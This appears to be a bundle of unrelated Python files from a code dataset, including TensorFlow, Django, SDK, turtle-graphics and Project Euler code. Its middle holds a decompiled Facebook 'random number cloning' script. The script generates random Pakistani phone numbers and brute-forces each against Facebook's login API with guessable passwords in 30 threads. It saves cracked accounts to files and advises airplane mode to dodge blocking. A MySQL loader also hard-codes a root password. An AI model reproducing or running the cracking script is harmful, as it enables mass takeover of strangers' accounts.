with tf.Session() as sess:
usrcnn = USRCNN(sess)
usrcnn.load(sess, './model/weights', "./model/meta_data.pickle")
result = usrcnn.enhance_resolution(test_img_resized)
plt.imshow(result)
"""
def load_img_list_and_extract_patch_list(dir_path):
name_list = os.listdir(dir_path)
img_list = []
for name in name_list:
img_path = "{}/{}".format(dir_path, name)
img = cv2.imread(img_path)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img_list.append(img)
return img_list
test_img_list = load_img_list_and_extract_patch_list("./data/celeba")
test_img = test_img_list[10]
test_img_resized = cv2.resize(test_img, (test_img.shape[1]//3, test_img.shape[0]//3), interpolation = cv2.INTER_CUBIC)
test_img_resized = cv2.resize(test_img_resized, (test_img.shape[1],test_img.shape[0]), interpolation = cv2.INTER_CUBIC)
sess = tf.Session():
usrcnn = USRCNN(sess)
usrcnn.load(sess, './model/weights', "./model/meta_data.pickle")
result = usrcnn.enhance_resolution(test_img_resized)
plt.imshow(result)
"""
| StarcoderdataPython |
1980284 | # -*- coding = utf-8 -*-
# @Time:2021/3/315:50
# @Author:Linyu
# @Software:PyCharm
import pandas as pd
from sqlalchemy import create_engine
import pymysql
#读取Excel表格数据
excelFile = 'otherBook.xls'
df = pd.DataFrame(pd.read_excel(excelFile))
#写入数据库
engine = create_engine('mysql+pymysql://root:123456@localhost:3306/coreBooks',encoding='utf8')
df.to_sql('otherBook',con=engine,if_exists='replace',index=False)
| StarcoderdataPython |
186829 | # tgcalls - a Python binding for C++ library by Telegram
# pytgcalls - a library connecting the Python binding with MTProto
# Copyright (C) 2020-2021 Il`ya (Marshal) <https://github.com/MarshalX>
#
# This file is part of tgcalls and pytgcalls.
#
# tgcalls and pytgcalls is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# tgcalls and pytgcalls is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License v3
# along with tgcalls. If not, see <http://www.gnu.org/licenses/>.
import asyncio
import logging
from typing import Callable, List
from typing import TYPE_CHECKING
from ..exceptions import PytgcallsError
if TYPE_CHECKING:
from . import GroupCallNative
logger = logging.getLogger(__name__)
class Dispatcher:
def __init__(self, available_actions: type):
self.actions = available_actions
self.__action_to_handlers = self.__build_handler_storage()
def __build_handler_storage(self):
logger.debug('Build storage of handlers for dispatcher.')
return {action: [] for action in dir(self.actions) if not action.startswith('_')}
def add_handler(self, callback: Callable, action: str) -> Callable:
logger.debug(f'Add handler to {action} action...')
if not asyncio.iscoroutinefunction(callback):
raise PytgcallsError('Sync callback does not supported')
try:
handlers = self.__action_to_handlers[action]
if callback in handlers:
logger.debug('Handler is already set.')
return callback
handlers.append(callback)
except KeyError:
raise PytgcallsError('Invalid action')
logger.debug('Handler added.')
return callback
def remove_handler(self, callback: Callable, action: str) -> bool:
logger.debug(f'Remove handler of {action} action...')
try:
handlers = self.__action_to_handlers[action]
for i in range(len(handlers)):
if handlers[i] == callback:
del handlers[i]
return True
except KeyError:
raise PytgcallsError('Invalid action')
return False
def remove_all(self):
self.__action_to_handlers = self.__build_handler_storage()
def get_handlers(self, action: str) -> List[Callable]:
try:
logger.debug(f'Get {action} handlers...')
return self.__action_to_handlers[action]
except KeyError:
raise PytgcallsError('Invalid action')
def trigger_handlers(self, action: str, instance: 'GroupCallNative', *args, **kwargs):
logger.debug(f'Trigger {action} handlers...')
for handler in self.get_handlers(action):
logger.debug(f'Trigger {handler.__name__}...')
asyncio.ensure_future(handler(instance, *args, **kwargs), loop=instance.mtproto.get_event_loop())
| StarcoderdataPython |
220196 | # coding=utf8
# Copyright 2018 JDCLOUD.COM
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# NOTE: This class is auto generated by the jdcloud code generator program.
from jdcloud_sdk.core.jdcloudrequest import JDCloudRequest
class DescribeMetricDataRequest(JDCloudRequest):
"""
查看某资源多个监控项数据,metric介绍1:<a href="https://docs.jdcloud.com/cn/monitoring/metrics">Metrics</a>
"""
def __init__(self, parameters, header=None, version="v1"):
super(DescribeMetricDataRequest, self).__init__(
'/regions/{regionId}/metrics/{metric}/metricData', 'GET', header, version)
self.parameters = parameters
class DescribeMetricDataParameters(object):
def __init__(self, regionId, metric, serviceCode, resourceId):
"""
:param regionId: 地域 Id
:param metric: 监控项英文标识(id)
:param serviceCode: 资源的类型,取值vm, lb, ip, database 等
:param resourceId: 资源的uuid
"""
self.regionId = regionId
self.metric = metric
self.aggrType = None
self.downSampleType = None
self.startTime = None
self.endTime = None
self.timeInterval = None
self.tags = None
self.groupBy = None
self.rate = None
self.serviceCode = serviceCode
self.resourceId = resourceId
def setAggrType(self, aggrType):
"""
:param aggrType: (Optional) 聚合方式,默认等于downSampleType或avg,可选值参考:sum、avg、last、min、max
"""
self.aggrType = aggrType
def setDownSampleType(self, downSampleType):
"""
:param downSampleType: (Optional) 采样方式,默认等于aggrType或avg,可选值参考:sum、avg、last、min、max
"""
self.downSampleType = downSampleType
def setStartTime(self, startTime):
"""
:param startTime: (Optional) 查询时间范围的开始时间, UTC时间,格式:2016-12-11T00:00:00+0800(注意在url中+要转译为%2B故url中为2016-12-11T00:00:00%2B0800)
"""
self.startTime = startTime
def setEndTime(self, endTime):
"""
:param endTime: (Optional) 查询时间范围的结束时间, UTC时间,格式:2016-12-11T00:00:00+0800(为空时,将由startTime与timeInterval计算得出)(注意在url中+要转译为%2B故url中为2016-12-11T00:00:00%2B0800)
"""
self.endTime = endTime
def setTimeInterval(self, timeInterval):
"""
:param timeInterval: (Optional) 时间间隔:1h,6h,12h,1d,3d,7d,14d,固定时间间隔,timeInterval默认为1h,当前时间往 前1h
"""
self.timeInterval = timeInterval
def setTags(self, tags):
"""
:param tags: (Optional) 监控指标数据的维度信息,根据tags来筛选指标数据不同的维度
"""
self.tags = tags
def setGroupBy(self, groupBy):
"""
:param groupBy: (Optional) 是否对查询的tags分组
"""
self.groupBy = groupBy
def setRate(self, rate):
"""
:param rate: (Optional) 是否求速率
"""
self.rate = rate
| StarcoderdataPython |
3476142 | # --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
from azure.cli.testsdk.scenario_tests import RecordingProcessor
from azure.cli.testsdk.scenario_tests.utilities import is_text_payload
class CredentialReplacer(RecordingProcessor):
def recursive_hide(self, props):
# hide sensitive data recursively
fake_content = 'hidden'
sensitive_keys = ['secret']
sensitive_data = ['password=', 'key=']
if isinstance(props, dict):
for key in props:
if key in sensitive_keys:
props[key] = fake_content
props[key] = self.recursive_hide(props[key])
elif isinstance(props, list):
for index, val in enumerate(props):
props[index] = self.recursive_hide(val)
elif isinstance(props, str):
for data in sensitive_data:
if data in props.lower():
props = fake_content
return props
def process_request(self, request):
import json
# hide secrets in request body
if is_text_payload(request) and request.body and json.loads(request.body):
body = self.recursive_hide(json.loads(request.body))
request.body = json.dumps(body)
# hide token in header
if 'x-ms-cupertino-test-token' in request.headers:
request.headers['x-ms-cupertino-test-token'] = 'hidden'
if 'x-ms-serviceconnector-user-token' in request.headers:
request.headers['x-ms-serviceconnector-user-token'] = 'hidden'
return request
def process_response(self, response):
import json
if is_text_payload(response) and response['body']['string']:
try:
body = json.loads(response['body']['string'])
body = self.recursive_hide(body)
response['body']['string'] = json.dumps(body)
except Exception: # pylint: disable=broad-except
pass
return response
| StarcoderdataPython |
1637380 | # Decompile by Mr. NIKI:)
# <NAME>
# Time Succes decompile : 2021-12-20 23:29:35.227070
import os, sys, time, datetime, random, hashlib, re, threading, json, urllib, cookielib, getpass
os.system('rm -rf .txt')
for n in range(30000):
nmbr = random.randint(1111111, 9999999)
sys.stdout = open('.txt', 'a')
print nmbr
sys.stdout.flush()
try:
import requests
except ImportError:
os.system('pip2 install mechanize')
try:
import mechanize
except ImportError:
os.system('pip2 install request')
time.sleep(1)
os.system('python2 .README.md')
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('user-agent', 'Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!' + w[random.randint(0, len(w) - 1)] + i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x = x.replace('!%s' % i, '\x1b[%s;1m' % str(31 + j))
x += '\x1b[0m'
x = x.replace('!0', '\x1b[0m')
sys.stdout.write(x + '\n')
logo = '\n \x1b[1;97m RAKIB RAKIB RAKIB## \x1b[1;0m\n \x1b[1;91m RR KK II BB ++ ** \x1b[1;0m\n \x1b[1;97m RR AA KK IB \x1b[1;0m\n \x1b[1;91m GGGFFF FFFGGG RAKIB*** \x1b[1;0m\n \x1b[1;97m BO OS S SS \x1b[1;0m\n \x1b[1;91m BB RR AA KK II BB \x1b[1;0m\n \x1b[1;97m GGGFFF FFFGGG GGGGFFFF \x1b[1;0m\n\x1b[1;97m------------------------\x1b[1;97m------------------------\n\x1b[1;91m[!]\x1b[1;97m Author \x1b[1;97m : \x1b[1;97m Sarfraz Baloch\n\x1b[1;91m[!]\x1b[1;97m Facebook\x1b[1;97m: \x1b[1;97m Sarfraz Baloch\n\x1b[1;91m[!]\x1b[1;97m GitHub\x1b[1;97m : \x1b[1;97m Sarfraz-Baloch\n\x1b[1;91m[!]\x1b[1;97m Version\x1b[1;97m : \x1b[1;97m 4.0.1\n\x1b[1;97m------------------------\x1b[1;97m------------------------\n '
logo1 = ' \n\n\x1b[4;97mSELECT PAK SIM CODE \x1b[1;0m\n\x1b[1;97m[1] Jazz \x1b[1;97m 00,01,02,03,04,05,06,07,08\n\x1b[1;97m[2] Zong \x1b[1;97m 11,12,13,14,15,16,17\n\x1b[1;97m[3] Warid \x1b[1;97m 21,22,23,24,25\n\x1b[1;97m[4] Ufone \x1b[1;97m 30,31,32,33,34,35\n\x1b[1;97m[3] Telenor \x1b[1;97m 40,41,42,43,44,45,46,47\n\n\n\n\x1bx \x1b[1;97m\x1b[1;0m\n'
back = 0
berhasil = []
cekpoint = []
oks = []
id = []
cpb = []
def menu():
os.system('clear')
print logo
print '\x1b[1;97m-----------------------------------------------------'
print
print '\x1b[1;97m[1] START Random Number Cloning '
print
print '\x1b[1;97m-----------------------------------------------------'
action()
def action():
global cpb
global oks
ss = raw_input('\x1b[1;97m>>>> ')
if ss == '':
print '[!] Warning'
action()
elif ss == '1':
os.system('clear')
print logo
print logo1
try:
c = raw_input('\x1b[1;97mCODE : ')
k = '03'
idlist = '.txt'
for line in open(idlist, 'r').readlines():
id.append(line.strip())
except IOError:
print '[!] File Not Found'
raw_input('\n[ Back ]')
menu()
elif ss == '0':
menu()
else:
print '[!] Select valid option'
action()
os.system('clear')
print logo
print '\x1b[1;91m Use flight (airplane) mode before use'
print '\x1b[1;97m-----------------------------------------------------'
sss = str(len(id))
print '\x1b[1;97m TOTAL IDS :\x1b[1;92m ' + sss
print '\x1b[1;97m-----------------------------------------------------'
def main(arg):
user = arg
try:
os.mkdir('save')
except OSError:
pass
try:
pass1 = user
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92m [SSB_OK] ' + k + c + user + ' | ' + pass1
okb = open('save/SsCP.txt', 'a')
okb.write(k + c + user + pass1 + '\n')
okb.close()
oks.append(c + user + pass1)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m [SSB_CP] ' + k + c + user + ' | ' + pass1
cps = open('save/SSCP.txt', 'a')
cps.write(k + c + user + pass1 + '\n')
cps.close()
cpb.append(c + user + pass1)
else:
pass2 = k + c + user
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD>2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92m [SSB_OK] ' + k + c + user + ' | ' + pass2
okb = open('save/SS.OK.txt', 'a')
okb.write(k + c + user + pass2 + '\n')
okb.close()
oks.append(c + user + pass2)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m [SSB_CP] ' + k + c + user + ' | ' + pass2
cps = open('save/SSCP.txt', 'a')
cps.write(k + c + user + pass2 + '\n')
cps.close()
cpb.append(c + user + pass2)
else:
pass3 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92m [SSB_CP] ' + k + c + user + ' | ' + pass3
okb = open('save/SSCP.txt', 'a')
okb.write(k + c + user + pass3 + '\n')
okb.close()
oks.append(c + user + pass3)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m [SSB_CP] ' + k + c + user + ' | ' + pass3
cps = open('save/SSCP.txt', 'a')
cps.write(k + c + user + pass3 + '\n')
cps.close()
cpb.append(c + user + pass3)
else:
pass4 = 'pakistan'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD>3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92m [SSB_OK] ' + k + c + user + ' | ' + pass4
okb = open('save/SSCP.txt', 'a')
okb.write(k + c + user + pass4 + '\n')
okb.close()
oks.append(c + user + pass3)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m [SSB_CP] ' + k + c + user + ' | ' + pass4
cps = open('save/SSCP.txt', 'a')
cps.write(k + c + user + pass4 + '\n')
cps.close()
cpb.append(c + user + pass4)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\x1b[1;97m-----------------------------------------------------'
print 'Process Has Been Completed ...'
print 'Total OK : ' + str(len(oks))
print 'Total CP : ' + str(len(cpb))
print '\x1b[1;97m-----------------------------------------------------'
raw_input('Press enter to back SSB Menu ')
if __name__ == '__main__':
menu()
# Mau <NAME>?
| StarcoderdataPython |
11325336 | <gh_stars>0
import os.path as osp
import lmdb
import pyarrow as pa
import torch.utils.data as data
import copy
from srcOld.dataloader_utils import SeqFlip
class Dataset_lmdb(data.Dataset):
'''
Reads an lmdb database.
Expects the data to be packed as follows:
(features, target, mask)
features = (seq, pssm, entropy)
target = (dist, omega, phi, theta)
'''
def __init__(self, db_path, transform=None, target_transform=None, mask_transform=None):
self.db_path = db_path
self.env = lmdb.open(db_path, subdir=osp.isdir(db_path), max_readers=1,
readonly=True, lock=False,
readahead=False, meminit=False)
with self.env.begin(write=False) as txn:
# self.length = txn.stat()['entries'] - 1
self.length = pa.deserialize(txn.get(b'__len__'))
self.keys = pa.deserialize(txn.get(b'__keys__'))
self.transform = transform
self.target_transform = target_transform
self.mask_transform = mask_transform
# self.nfeatures = 84
def __getitem__(self, index):
env = self.env
with env.begin(write=False) as txn:
byteflow = txn.get(self.keys[index])
unpacked = pa.deserialize(byteflow)
# load image
features = copy.deepcopy(unpacked[0])
targets = copy.deepcopy(unpacked[1])
# coords = copy.deepcopy(unpacked[2])
# mask = copy.deepcopy(unpacked[2])
if isinstance(self.transform.transforms[0], SeqFlip):
self.transform.transforms[0].reroll()
if self.transform is not None:
features = self.transform(features)
if self.target_transform is not None:
distances, coords = self.target_transform(targets)
# if self.mask_transform is not None:
# mask = self.mask_transform(mask)
return features, distances, coords
def __len__(self):
return self.length
def __repr__(self):
return self.__class__.__name__ + ' (' + self.db_path + ')'
| StarcoderdataPython |
6552577 | <filename>Halloween Special 2019/Halloween 2k19.py
import turtle
Spoopy = turtle.Turtle()
Spoopy.color('black')
Spoopy.pensize(5)
Spoopy.shape('turtle')
#pumpkin right side
Spoopy.pendown()
Spoopy.right(90)
Spoopy.forward(160)
Spoopy.left(115)
Spoopy.forward(160)
Spoopy.left(65)
Spoopy.forward(160)
Spoopy.left(115)
Spoopy.forward(160)
#pumpkin left side
Spoopy.right(50)
Spoopy.forward(160)
Spoopy.left(115)
Spoopy.forward(160)
Spoopy.left(65)
Spoopy.forward(160)
Spoopy.left(115)
Spoopy.forward(160)
Spoopy.right(65)
Spoopy.forward(160)
#pumpkin top side
Spoopy.left(130)
Spoopy.forward(160)
Spoopy.left(50)
Spoopy.forward(160)
Spoopy.penup()
Spoopy.left(130)
Spoopy.forward(160)
Spoopy.right(65)
Spoopy.forward(160)
Spoopy.left(115)
#pumpkin face
Spoopy.forward(30)
Spoopy.left(65)
Spoopy.forward(20)
Spoopy.pendown()
#pumpkin mouth
Spoopy.forward(20)
Spoopy.left(115)
Spoopy.forward(10)
Spoopy.right(115)
Spoopy.forward(20)
Spoopy.right(65)
Spoopy.forward(10)
Spoopy.left(65)
Spoopy.forward(10)
Spoopy.right(65)
Spoopy.forward(10)
Spoopy.right(115)
Spoopy.forward(10)
Spoopy.left(115)
Spoopy.forward(10)
Spoopy.left(65)
Spoopy.forward(10)
Spoopy.right(65)
Spoopy.forward(10)
Spoopy.right(115)
Spoopy.forward(10)
Spoopy.left(115)
Spoopy.forward(20)
Spoopy.left(65)
Spoopy.forward(10)
Spoopy.right(65)
Spoopy.forward(10)
Spoopy.right(115)
Spoopy.forward(10)
Spoopy.left(115)
Spoopy.forward(20)
Spoopy.left(65)
Spoopy.forward(10)
Spoopy.right(65)
Spoopy.forward(10)
Spoopy.right(115)
Spoopy.forward(10)
Spoopy.left(115)
Spoopy.forward(10)
Spoopy.left(65)
Spoopy.forward(10)
Spoopy.right(65)
Spoopy.forward(10)
Spoopy.right(115)
Spoopy.forward(20)
Spoopy.left(115)
Spoopy.forward(10)
Spoopy.right(115)
Spoopy.forward(20)
Spoopy.right(65)
Spoopy.forward(20)
Spoopy.right(115)
Spoopy.forward(10)
Spoopy.left(115)
Spoopy.forward(10)
Spoopy.left(65)
Spoopy.forward(20)
Spoopy.right(65)
Spoopy.forward(10)
Spoopy.right(115)
Spoopy.forward(10)
Spoopy.left(115)
Spoopy.forward(20)
Spoopy.right(115)
Spoopy.forward(10)
Spoopy.left(115)
Spoopy.forward(10)
Spoopy.left(65)
Spoopy.forward(10)
Spoopy.right(65)
Spoopy.forward(10)
Spoopy.left(65)
Spoopy.forward(10)
Spoopy.right(65)
Spoopy.forward(10)
Spoopy.right(115)
Spoopy.forward(20)
Spoopy.left(115)
Spoopy.forward(10)
Spoopy.left(65)
Spoopy.forward(10)
Spoopy.right(65)
Spoopy.forward(10)
Spoopy.left(65)
Spoopy.forward(10)
Spoopy.right(65)
Spoopy.forward(10)
Spoopy.penup()
Spoopy.right(115)
Spoopy.forward(70)
#pumpkin left eye
Spoopy.pendown()
Spoopy.forward(30)
Spoopy.right(65)
Spoopy.forward(10)
Spoopy.left(65)
Spoopy.forward(20)
Spoopy.right(65)
Spoopy.forward(20)
Spoopy.right(115)
Spoopy.forward(10)
Spoopy.left(115)
Spoopy.forward(10)
Spoopy.right(115)
Spoopy.forward(40)
Spoopy.right(65)
Spoopy.forward(10)
Spoopy.left(65)
Spoopy.forward(10)
Spoopy.right(65)
Spoopy.forward(20)
Spoopy.right(115)
Spoopy.forward(10)
Spoopy.left(115)
Spoopy.forward(10)
Spoopy.penup()
Spoopy.right(180)
Spoopy.forward(60)
Spoopy.pendown()
#pumpkin right eye
Spoopy.left(65)
Spoopy.forward(40)
Spoopy.right(65)
Spoopy.forward(10)
Spoopy.left(65)
Spoopy.forward(10)
Spoopy.right(65)
Spoopy.forward(10)
Spoopy.right(115)
Spoopy.forward(10)
Spoopy.left(115)
Spoopy.forward(10)
Spoopy.right(115)
Spoopy.forward(10)
Spoopy.left(115)
Spoopy.forward(10)
Spoopy.right(115)
Spoopy.forward(20)
Spoopy.left(115)
Spoopy.forward(10)
Spoopy.right(115)
Spoopy.forward(20)
Spoopy.right(65)
Spoopy.forward(40)
Spoopy.right(115)
Spoopy.forward(10)
Spoopy.left(115)
Spoopy.forward(10)
Spoopy.penup()
Spoopy.forward(90)
Spoopy.right(115)
Spoopy.forward(70)
#stem
Spoopy.left(65)
Spoopy.forward(70)
Spoopy.right(130)
Spoopy.forward(70)
Spoopy.pendown()
Spoopy.left(65)
Spoopy.right(65)
Spoopy.forward(20)
Spoopy.left(130)
Spoopy.forward(10)
Spoopy.right(130)
Spoopy.forward(10)
Spoopy.left(130)
Spoopy.forward(10)
Spoopy.right(130)
Spoopy.forward(10)
Spoopy.left(130)
Spoopy.forward(20)
Spoopy.left(50)
Spoopy.forward(20)
Spoopy.left(130)
Spoopy.forward(10)
Spoopy.right(130)
Spoopy.forward(10)
Spoopy.left(130)
Spoopy.forward(10)
Spoopy.right(130)
Spoopy.forward(10)
Spoopy.left(130)
Spoopy.forward(20)
Spoopy.right(65)
Spoopy.forward(10)
Spoopy.right(115)
Spoopy.forward(20)
Spoopy.right(65)
Spoopy.forward(25)
Spoopy.penup()
Spoopy.right(90)
Spoopy.forward(36)
Spoopy.pendown()
Spoopy.right(90)
Spoopy.forward(25)
Spoopy.right(65)
Spoopy.forward(20)
Spoopy.penup()
Spoopy.forward(200)
| StarcoderdataPython |
6650125 | <reponame>uktrade/lite-internal-frontend
from pytest import fixture
import shared.tools.helpers as utils
from pages.queues_pages import QueuesPages
from pages.shared import Shared
@fixture(scope="module")
def add_queue(driver, request, api_url, context):
QueuesPages(driver).click_add_a_queue_button()
extra_string = str(utils.get_formatted_date_time_d_h_m_s())
context.queue_name = "Review" + extra_string
QueuesPages(driver).enter_queue_name(context.queue_name)
Shared(driver).click_submit()
| StarcoderdataPython |
8059246 | <filename>acl/signals.py<gh_stars>0
from django.contrib.auth.models import Permission
from django.contrib.contenttypes.models import ContentType
from django.db.models.signals import post_save
from django.dispatch import receiver
from .models import ACLBase
from entity.models import Entity, EntityAttr
from entry.models import Entry, Attribute
from airone.lib.acl import ACLType
def create_permission(instance):
content_type = ContentType.objects.get_for_model(instance)
for acltype in ACLType.availables():
codename = "%s.%s" % (instance.id, acltype.id)
Permission(name=acltype.name, codename=codename, content_type=content_type).save()
@receiver(post_save, sender=ACLBase)
def aclbase_create_permission(sender, instance, created, **kwargs):
if created:
create_permission(instance)
@receiver(post_save, sender=Entity)
def entity_create_permission(sender, instance, created, **kwargs):
if created:
create_permission(instance)
@receiver(post_save, sender=EntityAttr)
def entity_attr_create_permission(sender, instance, created, **kwargs):
if created:
create_permission(instance)
@receiver(post_save, sender=Entry)
def entry_create_permission(sender, instance, created, **kwargs):
if created:
create_permission(instance)
@receiver(post_save, sender=Attribute)
def attribute_create_permission(sender, instance, created, **kwargs):
if created:
create_permission(instance)
| StarcoderdataPython |
9646200 | """
[ref.href] https://projecteuler.net/problem=13
Large sum.
Work out the first ten digits of the sum of the following one-hundred 50-digit numbers.
37107287533902102798797998220837590246510135740250
46376937677490009712648124896970078050417018260538
74324986199524741059474233309513058123726617309629
91942213363574161572522430563301811072406154908250
23067588207539346171171980310421047513778063246676
89261670696623633820136378418383684178734361726757
28112879812849979408065481931592621691275889832738
44274228917432520321923589422876796487670272189318
47451445736001306439091167216856844588711603153276
70386486105843025439939619828917593665686757934951
62176457141856560629502157223196586755079324193331
64906352462741904929101432445813822663347944758178
92575867718337217661963751590579239728245598838407
58203565325359399008402633568948830189458628227828
80181199384826282014278194139940567587151170094390
35398664372827112653829987240784473053190104293586
86515506006295864861532075273371959191420517255829
71693888707715466499115593487603532921714970056938
54370070576826684624621495650076471787294438377604
53282654108756828443191190634694037855217779295145
36123272525000296071075082563815656710885258350721
45876576172410976447339110607218265236877223636045
17423706905851860660448207621209813287860733969412
81142660418086830619328460811191061556940512689692
51934325451728388641918047049293215058642563049483
62467221648435076201727918039944693004732956340691
15732444386908125794514089057706229429197107928209
55037687525678773091862540744969844508330393682126
18336384825330154686196124348767681297534375946515
80386287592878490201521685554828717201219257766954
78182833757993103614740356856449095527097864797581
16726320100436897842553539920931837441497806860984
48403098129077791799088218795327364475675590848030
87086987551392711854517078544161852424320693150332
59959406895756536782107074926966537676326235447210
69793950679652694742597709739166693763042633987085
41052684708299085211399427365734116182760315001271
65378607361501080857009149939512557028198746004375
35829035317434717326932123578154982629742552737307
94953759765105305946966067683156574377167401875275
88902802571733229619176668713819931811048770190271
25267680276078003013678680992525463401061632866526
36270218540497705585629946580636237993140746255962
24074486908231174977792365466257246923322810917141
91430288197103288597806669760892938638285025333403
34413065578016127815921815005561868836468420090470
23053081172816430487623791969842487255036638784583
11487696932154902810424020138335124462181441773470
63783299490636259666498587618221225225512486764533
67720186971698544312419572409913959008952310058822
95548255300263520781532296796249481641953868218774
76085327132285723110424803456124867697064507995236
37774242535411291684276865538926205024910326572967
23701913275725675285653248258265463092207058596522
29798860272258331913126375147341994889534765745501
18495701454879288984856827726077713721403798879715
38298203783031473527721580348144513491373226651381
34829543829199918180278916522431027392251122869539
40957953066405232632538044100059654939159879593635
29746152185502371307642255121183693803580388584903
41698116222072977186158236678424689157993532961922
62467957194401269043877107275048102390895523597457
23189706772547915061505504953922979530901129967519
86188088225875314529584099251203829009407770775672
11306739708304724483816533873502340845647058077308
82959174767140363198008187129011875491310547126581
97623331044818386269515456334926366572897563400500
42846280183517070527831839425882145521227251250327
55121603546981200581762165212827652751691296897789
32238195734329339946437501907836945765883352399886
75506164965184775180738168837861091527357929701337
62177842752192623401942399639168044983993173312731
32924185707147349566916674687634660915035914677504
99518671430235219628894890102423325116913619626622
73267460800591547471830798392868535206946944540724
76841822524674417161514036427982273348055556214818
97142617910342598647204516893989422179826088076852
87783646182799346313767754307809363333018982642090
10848802521674670883215120185883543223812876952786
71329612474782464538636993009049310363619763878039
62184073572399794223406235393808339651327408011116
66627891981488087797941876876144230030984490851411
60661826293682836764744779239180335110989069790714
85786944089552990653640447425576083659976645795096
66024396409905389607120198219976047599490197230297
64913982680032973156037120041377903785566085089252
16730939319872750275468906903707539413042652315011
94809377245048795150954100921645863754710598436791
78639167021187492431995700641917969777599028300699
15368713711936614952811305876380278410754449733078
40789923115535562561142322423255033685442488917353
44889911501440648020369068063960672322193204149535
41503128880339536053299340368006977710650566631954
81234880673210146739058568557934581403627822703280
82616570773948327592232845941706525094512325230608
22918802058777319719839450180888072429661980811197
77158542502016545090413245809786882778948721859617
72107838435069186155435662884062257473692284509516
20849603980134001723930671666823555245252804609722
53503534226472524250874054075591789781264330331690
"""
BIGNUM = \
"37107287533902102798797998220837590246510135740250\
46376937677490009712648124896970078050417018260538\
74324986199524741059474233309513058123726617309629\
91942213363574161572522430563301811072406154908250\
23067588207539346171171980310421047513778063246676\
89261670696623633820136378418383684178734361726757\
28112879812849979408065481931592621691275889832738\
44274228917432520321923589422876796487670272189318\
47451445736001306439091167216856844588711603153276\
70386486105843025439939619828917593665686757934951\
62176457141856560629502157223196586755079324193331\
64906352462741904929101432445813822663347944758178\
92575867718337217661963751590579239728245598838407\
58203565325359399008402633568948830189458628227828\
80181199384826282014278194139940567587151170094390\
35398664372827112653829987240784473053190104293586\
86515506006295864861532075273371959191420517255829\
71693888707715466499115593487603532921714970056938\
54370070576826684624621495650076471787294438377604\
53282654108756828443191190634694037855217779295145\
36123272525000296071075082563815656710885258350721\
45876576172410976447339110607218265236877223636045\
17423706905851860660448207621209813287860733969412\
81142660418086830619328460811191061556940512689692\
51934325451728388641918047049293215058642563049483\
62467221648435076201727918039944693004732956340691\
15732444386908125794514089057706229429197107928209\
55037687525678773091862540744969844508330393682126\
18336384825330154686196124348767681297534375946515\
80386287592878490201521685554828717201219257766954\
78182833757993103614740356856449095527097864797581\
16726320100436897842553539920931837441497806860984\
48403098129077791799088218795327364475675590848030\
87086987551392711854517078544161852424320693150332\
59959406895756536782107074926966537676326235447210\
69793950679652694742597709739166693763042633987085\
41052684708299085211399427365734116182760315001271\
65378607361501080857009149939512557028198746004375\
35829035317434717326932123578154982629742552737307\
94953759765105305946966067683156574377167401875275\
88902802571733229619176668713819931811048770190271\
25267680276078003013678680992525463401061632866526\
36270218540497705585629946580636237993140746255962\
24074486908231174977792365466257246923322810917141\
91430288197103288597806669760892938638285025333403\
34413065578016127815921815005561868836468420090470\
